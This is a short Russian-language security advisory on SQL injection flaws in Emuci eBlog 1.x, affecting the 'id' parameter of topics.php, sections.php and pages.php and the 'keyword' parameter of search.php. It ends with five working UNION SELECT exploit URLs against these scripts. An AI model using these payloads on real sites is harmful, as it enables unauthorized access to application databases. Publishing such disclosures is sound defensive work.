• Партнер

  • Программа: Emuci eBlog 1.x

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
    команды в базе данных приложения.

    1) Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "id" сценариями topics.php и sections.php. Удаленный пользователь
    может с помощью специально сформированного запроса выполнить произвольные SQL
    команды в базе данных приложения.

    2) Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "id" сценарием pages.php и в параметре "keyword" сценарием search.php.
    Удаленный пользователь может с помощью специально сформированного запроса
    выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT
    1,2,3,4,5,6,7%23
    http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
    http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
    http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
    http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии